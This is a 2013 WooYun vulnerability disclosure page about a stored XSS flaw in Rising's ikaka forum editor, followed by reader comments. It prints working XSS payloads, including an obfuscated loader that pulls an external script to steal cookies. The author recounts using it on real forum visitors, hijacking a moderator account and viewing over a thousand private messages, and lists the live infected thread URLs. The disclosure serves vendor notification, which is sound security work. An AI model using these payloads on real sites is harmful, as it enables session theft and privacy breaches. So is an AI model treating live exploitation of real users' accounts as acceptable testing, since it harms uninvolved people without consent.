当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033648

漏洞标题:对瑞星1rank储存型xss的分析与利用(xss如何变废为宝)

相关厂商:RiSing

漏洞作者: px1624

提交时间:2013-08-06 17:19

修复时间:2013-09-20 17:20

公开时间:2013-09-20 17:20

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-06: 细节已通知厂商并且等待厂商处理中
2013-08-06: 厂商已经确认,细节仅向厂商公开
2013-08-16: 细节向核心白帽子及相关领域专家公开
2013-08-26: 细节向普通白帽子公开
2013-09-05: 细节向实习白帽子公开
2013-09-20: 细节向公众公开

简要描述:

发现瑞星给好多储存型xss只给1rank,难道储存型xss的危害价值在瑞星看来就只值1rank?此漏洞附有比较长的xss挖掘与利用的分析,喜欢看XSS漏洞分析,以及不知道XSS能干嘛的可以关注看看。同时希望可以引起厂商对于xss漏洞的重视~

详细说明:

漏洞位置:论坛发帖回帖富文本编辑器
漏洞危害:
1 盗取用户登录cookie并成功登录
2 论坛等位置xss蠕虫
3 盗取管理员帐号获得大量敏感信息和操作权限
详细过程这里分两个部分:
一、XSS的挖掘分析
1 首先是看到一些储存型xss漏洞只给1rank比较气愤,觉得厂商不重视,在看到二哥gainover的回复,决定去挖掘实例让厂商引起对xss的重视度。传送门: WooYun: 偶然发现的卡卡论坛存储型xss...

1.png


2 开始xss挖掘过程,这里我定位到论坛的发帖回帖富文本编辑器位置。因为论坛的用户量比较大,而且富文本编辑器位置往往容易出现xss。测试的时候,一般随便选一个帖子在回复位置测试,不要去发帖子测试。因为回帖和发帖的位置一般都用的是一个富文本,回帖位置比较隐蔽,不易被发现。
3 先直接测试有没有过滤常用xss代码,输入

</textarea>'"><img src=1 onerror=alert(1)>

发现被直接输出了,看来常用的xss代码是有过滤的。F12看了一下输出点,也没有找到其他什么可以构造的xss点。

000.png


4 下来就测试一下其他位置吧,随便输入一些字符,试了试插图,这里也过滤了。

2.png


5 然后在发帖后点击编辑,看到了这里多了个插入视频选项,这下眼前一亮诶。

3.png


6 看到这个论坛的模式和编辑器很像discuz phpwind那些,所以果断插入代码:javascript:alert(1) 文件类型选择mp3

4.png


7 确认保存提交修改内容,吼吼,弹窗了。

5.png


8 F12看一下,发现这里是用到<embed>标签,所以可以直接在src位置利用javascript加载js代码。

6.png


9 好的,XSS的挖掘分析到此结束。
二、XSS的利用分析
1 首先F12看了下,发现论坛的cookie是没有http-only的,那么只要能xss到cookie,理论上来说就可以利用用户的登录cookie去登录用户帐号。

666.png


2 所以发了一个带有盗用用户cookie的xss的帖子(帖子的标题是为了引诱管理员过来)。
利用代码为:

javascript:with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='外部js文件地址'


7.png


3 自己先试了试可以成功获取到cookie,然后不一会就收到了一些cookie(由于是自动加载,所以只要访问帖子就会中招)。

77.png


4 利用xss到的cookie,成功登录的用户帐号。

8.png


5 看了下,果然是因为访问了那个帖子中招的。

9.png


6 再看了看信息,呵呵,完全和我计划的一样,搞的了大版主帐号。

10.png


7 下面就是利用大版主的帐号可以干的事情了,由于cookie没有http-only,而且是一站式cookie,所以能干的事情也蛮多的额。
对任意用户进行禁言等操作

11.png


12.png


对任意帖子进行删除、指定、加精等操作

13.png


短消息邮箱里面的1000多条用户的安全信息及隐私信息

14.png


瑞星网站的其他站点的业务操作

15.png


8 看了一下,论坛的发帖回帖等操作都是没有token等参数的,所以可以蠕虫,这里不在详细进行展示了。如需验证,可以私下联系我。

漏洞证明:

插入盗取cookie的帖子的地址:

http://bbs.ikaka.com/showtopic.aspx?page=end&topicid=9251068#11942968


这个帖子也插了条,在回复位置:

http://bbs.ikaka.com/showtopic-9250670.aspx

修复方案:

1 过滤下javascript字符串
2 post请求加token
3 没见过你们送礼物额~

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-08-06 17:33

厂商回复:

3Q。。。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-06 17:35 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    从1到5了。

  2. 2013-08-06 17:37 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    果断关注,给到5了,一定很严重!!!

  3. 2013-08-06 17:45 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    同楼上!

  4. 2013-08-06 17:48 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小龙 ......

  5. 2013-08-06 17:51 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @D&G @niliu @小龙 @xsser @RiSing 我去,给了普通储存xss的rank的倍了,同时评语位置也有东西了,看来厂商重视了啊!

  6. 2013-08-06 18:09 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @px1624 人家是让你拿好5毛

  7. 2013-08-06 18:10 | c2c2 ( 路人 | Rank:4 漏洞数:4 )

    哈哈哈哈

  8. 2013-08-06 19:42 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Finger @gainover 你完全可以尝试打一打管理员帐号?进而什么什么的,单纯的给出一个XSS点,= = 难以引起重视啊!

  9. 2013-08-06 21:38 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    mark下..应该值得学习吧..

  10. 2013-09-05 20:11 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    @Finger 真相帝~

  11. 2013-09-06 11:51 | whitemonty ( 路人 | Rank:7 漏洞数:4 | Secur1ty just lik3 a girl. B0th of th3m ...)

    厂商不能总是要求白帽子们把漏洞的详细危害搞出来,挖漏洞需要时间,利用也是需要时间,请厂商新生白帽子们的劳动呀

  12. 2013-09-06 12:04 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @whitemonty 嗯,写的这么详细,充其量也就是从1rank变为了5rank。。

  13. 2013-09-06 15:13 | 飞鞋拍小强 ( 路人 | Rank:2 漏洞数:1 | 小强)

    不把自己坛安全当回事,随便个几个rank的感觉。

  14. 2013-09-20 18:20 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @px1624 翻了好几倍了。增长比达到400% 知足吧 O(∩_∩)O哈哈~

  15. 2013-09-21 09:31 | softbug ( 实习白帽子 | Rank:66 漏洞数:10 | 为人类设计最好的软件,解放人的双手,一起...)

    瑞星,伪安全工作者,对漏洞的评估几乎是靠屁股!

  16. 2013-10-05 09:52 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    放弃瑞星把

  17. 2014-09-01 02:51 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    这是赤裸裸的藐视么?建议将瑞星厂商剔除掉。